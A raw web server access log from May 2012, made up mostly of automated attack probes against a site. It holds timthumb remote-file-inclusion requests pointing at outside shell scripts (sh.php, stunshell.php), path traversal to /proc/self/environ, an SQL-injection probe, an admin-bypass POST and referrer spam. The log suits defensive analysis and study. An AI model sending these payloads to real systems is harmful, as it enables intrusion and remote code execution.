79.143.179.218 - - [14/May/2012:10:09:23 +0200] "GET /stats/wp-content/themes/sealight/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:09:23 +0200] "GET /wp-content/themes/sealight/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:09:38 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:09:38 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:09:38 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:09:39 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:09:39 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:09:39 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:09:53 +0200] "GET /stats/wp-content/themes/crisp/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:09:54 +0200] "GET /wp-content/themes/crisp/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:10:11:12 +0200] "GET /logs/access_log HTTP/1.0" 200 1922528 "http://androidusplay.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:10:11:13 +0200] "GET /logs/access_log HTTP/1.0" 200 1922725 "http://androidusplay.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
78.137.37.171 - - [14/May/2012:10:11:13 +0200] "GET /logs/access_log HTTP/1.0" 200 1922956 "http://androidusplay.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
78.137.37.171 - - [14/May/2012:10:11:14 +0200] "GET /logs/access_log HTTP/1.0" 200 1923158 "http://androidusplay.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
78.137.37.171 - - [14/May/2012:10:11:14 +0200] "GET /logs/access_log HTTP/1.0" 200 1923371 "http://androidusplay.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
209.118.181.132 - - [14/May/2012:10:11:44 +0200] "GET /stats/log.keys.html HTTP/1.1" 200 20272 "http://www.grupposeit.it/stats/log.keys.html" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
79.143.179.218 - - [14/May/2012:10:13:02 +0200] "GET /stats/wp-content/themes/coda/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:13:02 +0200] "GET /wp-content/themes/coda/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
203.88.117.113 - - [14/May/2012:10:13:10 +0200] "GET /stats//wp-content/themes/spectrum/functions/timthumb.php?src=http://blogger.com.thinkgadgets.co.cc/stunshell.php HTTP/1.1" 404 338 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
184.173.6.208 - - [14/May/2012:10:13:10 +0200] "GET /stats////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/6.04"
203.88.117.113 - - [14/May/2012:10:13:11 +0200] "GET //wp-content/themes/spectrum/functions/timthumb.php?src=http://blogger.com.thinkgadgets.co.cc/stunshell.php HTTP/1.1" 404 332 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
79.143.179.218 - - [14/May/2012:10:13:13 +0200] "GET /stats/wp-content/themes/apz/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:13:13 +0200] "GET /wp-content/themes/apz/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:10:13:15 +0200] "GET ////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-" "libwww-perl/6.04"
203.88.117.113 - - [14/May/2012:10:13:34 +0200] "GET /stats//wp-content/themes/spectrum/functions/timthumb.php?src=http://blogger.com.thinkgadgets.co.cc/stunshell.php HTTP/1.1" 404 338 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
203.88.117.113 - - [14/May/2012:10:13:36 +0200] "GET //wp-content/themes/spectrum/functions/timthumb.php?src=http://blogger.com.thinkgadgets.co.cc/stunshell.php HTTP/1.1" 404 332 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
64.34.165.204 - - [14/May/2012:10:14:08 +0200] "POST /stats/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
64.34.165.204 - - [14/May/2012:10:14:08 +0200] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:10:14:18 +0200] "GET /stats////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/6.04"
184.173.6.208 - - [14/May/2012:10:14:19 +0200] "GET ////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-" "libwww-perl/6.04"
216.70.71.78 - - [14/May/2012:10:15:31 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:15:31 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:15:31 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:15:31 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:15:31 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:15:31 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:10:15:49 +0200] "GET /logs/access_log HTTP/1.0" 200 1928603 "http://androidusplay.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)"
78.137.37.171 - - [14/May/2012:10:15:50 +0200] "GET /logs/access_log HTTP/1.0" 200 1928800 "http://androidusplay.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
78.137.37.171 - - [14/May/2012:10:15:51 +0200] "GET /logs/access_log HTTP/1.0" 200 1929053 "http://androidusplay.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:10:15:51 +0200] "GET /logs/access_log HTTP/1.0" 200 1929241 "http://androidusplay.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]"
78.137.37.171 - - [14/May/2012:10:15:51 +0200] "GET /logs/access_log HTTP/1.0" 200 1929442 "http://androidusplay.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
199.127.226.130 - - [14/May/2012:10:15:51 +0200] "GET /stats/ HTTP/1.0" 200 6337669 "http://www.grupposeit.it/stats/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8"
216.70.71.78 - - [14/May/2012:10:16:29 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:16:29 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:16:29 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:16:29 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:16:29 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:16:29 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:16:40 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:16:41 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:16:41 +0200] "GET /stats//wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:16:41 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src= HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:16:41 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:16:42 +0200] "GET //wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:17:00 +0200] "GET /stats/wp-content/themes/diarise/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:17:00 +0200] "GET /wp-content/themes/diarise/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:17:53 +0200] "GET /stats/wp-content/themes/diner/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:17:53 +0200] "GET /wp-content/themes/diner/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:19:42 +0200] "GET /stats/wp-content/themes/slanted/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:19:42 +0200] "GET /wp-content/themes/slanted/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:10:20:13 +0200] "GET /logs/access_log HTTP/1.0" 200 1934591 "http://androidusplay.info/sitemap196.html" "Mozilla/0.6 Beta (Windows)"
78.137.37.171 - - [14/May/2012:10:20:15 +0200] "GET /logs/access_log HTTP/1.0" 200 1934755 "http://androidusplay.info/sitemap196.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:10:20:15 +0200] "GET /logs/access_log HTTP/1.0" 200 1934980 "http://androidusplay.info/sitemap196.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
78.137.37.171 - - [14/May/2012:10:20:16 +0200] "GET /logs/access_log HTTP/1.0" 200 1935192 "http://androidusplay.info/sitemap196.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:10:20:16 +0200] "GET /logs/access_log HTTP/1.0" 200 1935399 "http://androidusplay.info/sitemap196.html" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01"
95.132.213.162 - - [14/May/2012:10:21:20 +0200] "GET /logs/access_log HTTP/1.0" 200 1935583 "http://androidelsoft.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
95.132.213.162 - - [14/May/2012:10:21:23 +0200] "GET /logs/access_log HTTP/1.0" 200 1935821 "http://androidelsoft.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)"
95.132.213.162 - - [14/May/2012:10:21:38 +0200] "GET /logs/access_log HTTP/1.0" 200 1936089 "http://androidelsoft.info/sitemap35.html" "Opera/8.00 (Windows NT 5.1; U; en)"
95.132.213.162 - - [14/May/2012:10:21:44 +0200] "GET /logs/access_log HTTP/1.0" 200 1936261 "http://androidelsoft.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
95.132.213.162 - - [14/May/2012:10:22:06 +0200] "GET /logs/access_log HTTP/1.0" 200 1936458 "http://androidelsoft.info/sitemap35.html" "Opera/8.01 (Windows NT 5.1)"
79.143.179.218 - - [14/May/2012:10:23:04 +0200] "GET /stats/wp-content/themes/canvas/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:23:04 +0200] "GET /wp-content/themes/canvas/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:24:17 +0200] "GET /stats/wp-content/themes/delegate/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:24:17 +0200] "GET /wp-content/themes/delegate/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:10:24:41 +0200] "GET /logs/access_log HTTP/1.0" 200 1937627 "http://androidusplay.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))"
78.137.37.171 - - [14/May/2012:10:24:42 +0200] "GET /logs/access_log HTTP/1.0" 200 1937859 "http://androidusplay.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:10:24:42 +0200] "GET /logs/access_log HTTP/1.0" 200 1938084 "http://androidusplay.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
78.137.37.171 - - [14/May/2012:10:24:43 +0200] "GET /logs/access_log HTTP/1.0" 200 1938287 "http://androidusplay.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
78.137.37.171 - - [14/May/2012:10:24:43 +0200] "GET /logs/access_log HTTP/1.0" 200 1938538 "http://androidusplay.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
216.70.71.78 - - [14/May/2012:10:25:00 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src= HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:25:00 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:25:00 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:25:00 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src= HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:25:00 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:10:25:00 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:25:03 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src= HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:25:03 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:25:04 +0200] "GET /stats//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:25:04 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src= HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:25:04 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:10:25:04 +0200] "GET //wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:25:26 +0200] "GET /stats/wp-content/themes/mystream/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:25:26 +0200] "GET /wp-content/themes/mystream/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:25:51 +0200] "GET /stats/wp-content/themes/postcard/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:25:52 +0200] "GET /wp-content/themes/postcard/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:26:42 +0200] "GET /stats/wp-content/themes/sophisticatedfolio/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:26:42 +0200] "GET /wp-content/themes/sophisticatedfolio/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:26:56 +0200] "GET /stats/wp-content/themes/optimize/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
79.143.179.218 - - [14/May/2012:10:26:57 +0200] "GET /wp-content/themes/optimize/thumb.php?src=http://picasa.com.zlinkerparts.com/yahoo.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.198.216 - - [14/May/2012:10:28:28 +0200] "GET /stats/log.keys.html/content/view.asp?id=1' HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.198.216 - - [14/May/2012:10:28:28 +0200] "GET /content/view.asp?id=1' HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.198.216 - - [14/May/2012:10:28:28 +0200] "GET /stats/content/view.asp?id=1' HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:10:28:58 +0200] "GET /logs/access_log HTTP/1.0" 200 1944532 "http://androidusplay.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
